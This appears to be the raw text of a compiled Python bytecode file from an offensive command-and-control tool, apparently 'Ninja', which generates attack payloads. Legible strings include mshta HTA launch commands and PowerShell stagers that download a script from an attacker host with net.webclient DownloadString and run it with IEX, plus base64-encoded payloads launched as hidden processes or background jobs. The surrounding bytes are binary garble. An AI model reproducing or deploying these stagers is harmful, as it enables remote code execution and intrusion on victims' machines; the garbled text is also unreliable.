4iLddlmZmZddlmZddlmZddlTddlZddlZddl m Z eZ dZ dZ d Zd Zd Zd Zd ZdZdZdZdZdZdZdZdZdS))systempopen)Console)config)*N)Pathctjdtr tjdtjdtjtjtjdtjdtjtjdn tjdtjdtjtjtjdtjdtjtjdtddS) Nz9 [bold italic white][-] HTA-Payloads[/ bold italic white]z&[bold red]->[/bold red] mshta https://:z5[bold red]->[/bold red] powershell -c "mshta https://"z%[bold red]->[/bold red] mshta http://z4[bold red]->[/bold red] powershell -c "mshta http://z&[green][+] Created HTA-Payload[/green]) rPAYLOADSappendSSLHOSTPORT hta_payloadconsolelog!/home/kali/Ninja/core/payloads.py hta_paylodsr so OWXXX J w wwV\Vawcicuwwxxx JX^Xc J Jflfq JsytF J J J K K K K !vv{vvU[U`vbhbtvvwww IW]Wb I Iekep IrxsE I I I J J J KK899999rcd}d}d}trl|dtjdtjdt dd}nk|dtjdtjdt dd }t t|d }|d | d }|d | d } tj d tj d |tj dtj d |t ddS)NzvStart-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))}Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))" -WindowStyle Hidden$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('{HTTP}://{ip}:{port}{raw}');IEX($s){ip}{port}{raw}{HTTP}httpshttpUTF-8 {payload}z; [bold italic white][-] Powershell Job[/ bold italic white][bold red]->[/bold red] z? [bold italic white][-] Powershell Process[/ bold italic white]z@[green][+] Created Powershell Start-Job & Start-Process [/green])rreplacerrr raw_payloadbase64 b64encode bytearraydecoder r rr)commandJcommandPpayloadJOBPROCESSs rpwsh_jobr/sHHnHTG N//&&+66>>xUU]]^egrss{{}EGNOO//&&+66>>xUU]]^egrss{{}EGMNNy'::;;G   ;w(?(? @ @C{GNN7,C,CDDG OYZZZ O;c;;<<< O]^^^ O?g??@@@ KKRSSSSSrc$d}d}trl|dtjdtjdt dd}nk|dtjdtjdt dd}t t|d }|d | d } tj d tj d |t d dS)N]iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))z$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('{HTTP}://{ip}:{port}{hjf}');IEX($s)rrz{hjf}rrr r!r"z< [bold italic white][-] Powershell File[/ bold italic white]r#z*[green][+] Created Powershell File[/green])rr$rrr hjf_payloadr&r'r(r)r r rr)commandFr,FILEs r pwsh_filer50s\nHTG M//&&+66>>xUU]]^efqrrzz|DFMNN//&&+66>>xUU]]^efqrrzz|DFLMMy'::;;G   K)@)@ A AD OZ[[[ O>xUU]]^fgstt||~FHOPP//&&+66>>xUU]]^fgstt||~FHNOOy'::;;G   ;w(?(? @ @C OYZZZ O;c;;<<< KK;<<<<